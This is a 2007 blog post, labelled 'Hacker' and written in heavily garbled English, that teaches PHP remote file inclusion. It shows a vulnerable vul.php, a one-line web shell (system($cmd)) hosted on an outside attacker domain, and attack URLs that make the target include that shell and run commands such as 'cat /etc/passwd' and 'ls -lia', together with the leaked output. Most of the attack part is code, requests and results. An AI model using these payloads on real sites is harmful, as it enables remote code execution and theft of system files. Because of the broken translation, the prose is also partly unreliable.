Friday, November 16, 2007
at
9:20 AM
|
Often was encountered by us the weakness to some website with bug rfi and with the different method the difference that became the question, why that could happen?
All that could happen because source code that in publiblik and circulated in the market, definitely everyone could study and analyse some cms (Content Management System), and in fact include from php personally not some bug but a function for the merging of the different library.
An example:
/*************************************
* project : test include
* file name : var.php
************************************
*/
$a = 10;
$b = 3;
?>
/*************************************
* project : test include
* file name : add.php
************************************
*/
include("var.php")
$s_add = $a + $b;
print $a." + ".$b." = ".$s_add;
?>
Then after being undertaken by you add.php will get report 10 + 3 of = 13
really were easy not?
The other example:
/*************************************
* project : test include
* file name : passwd.php
************************************
*/
include("/etc/passwd")
?>
In script passwd.php would in received ouput as follows:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
bla..bla...bla...
And of course site will access the address url when getting the request from other url
like:
/*************************************
* project : test include
* file name : httP://www.youdomain.com/shell.txt
************************************
*/
system($cmd)
?>
/*************************************
* project : test include
* file name : httP://www.target.com/vul.php
************************************
*/
include($path_include."include/config.inc.php");
print $head;
bla...bla...bla...
?>
With vul.php that without in accompanied the filter input then script this suddah became the security gap, and with the request http://www.target.com/vul.php?path_include=http://www.youdomain.com/shell.txt an infiltrator has gotten access command
tried to be carried out by us the trial with the request:
http://www.target.com/vul.php?cmd=cat%20/ect/passwd&path_include=httP://www.youdomain.com/shell.txt
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
bla..bla...bla...
http://www.target.com/vul.php?cmd=ls%20-lia&path_include=httP://www.youdomain.com/shell.txt
28 -rwxr-xr-x 1 john john 25141 Oct 30 2006 archive.php
4 -rw-r--r-- 1 john john 522 Sep 10 05:38 config.inc.php
4 -rwxr-xr-x 1 john john 510 Oct 30 2006 config.inc.php.sample
8 -rwxr-xr-x 1 john john 5724 Oct 30 2006 crop.inc.php
8 -rwxr-xr-x 1 john john 5014 Oct 30 2006 debugger.inc.php
4 -rwxr-xr-x 1 john john 213 Oct 30 2006 vul.php
In this way we you have gotten access command
so many previously the article from me, it is hoped useful
Sorry when this article was not better because I still needed often studied
Posted by
admin
Labels:
Hacker
0 comments:
Post a Comment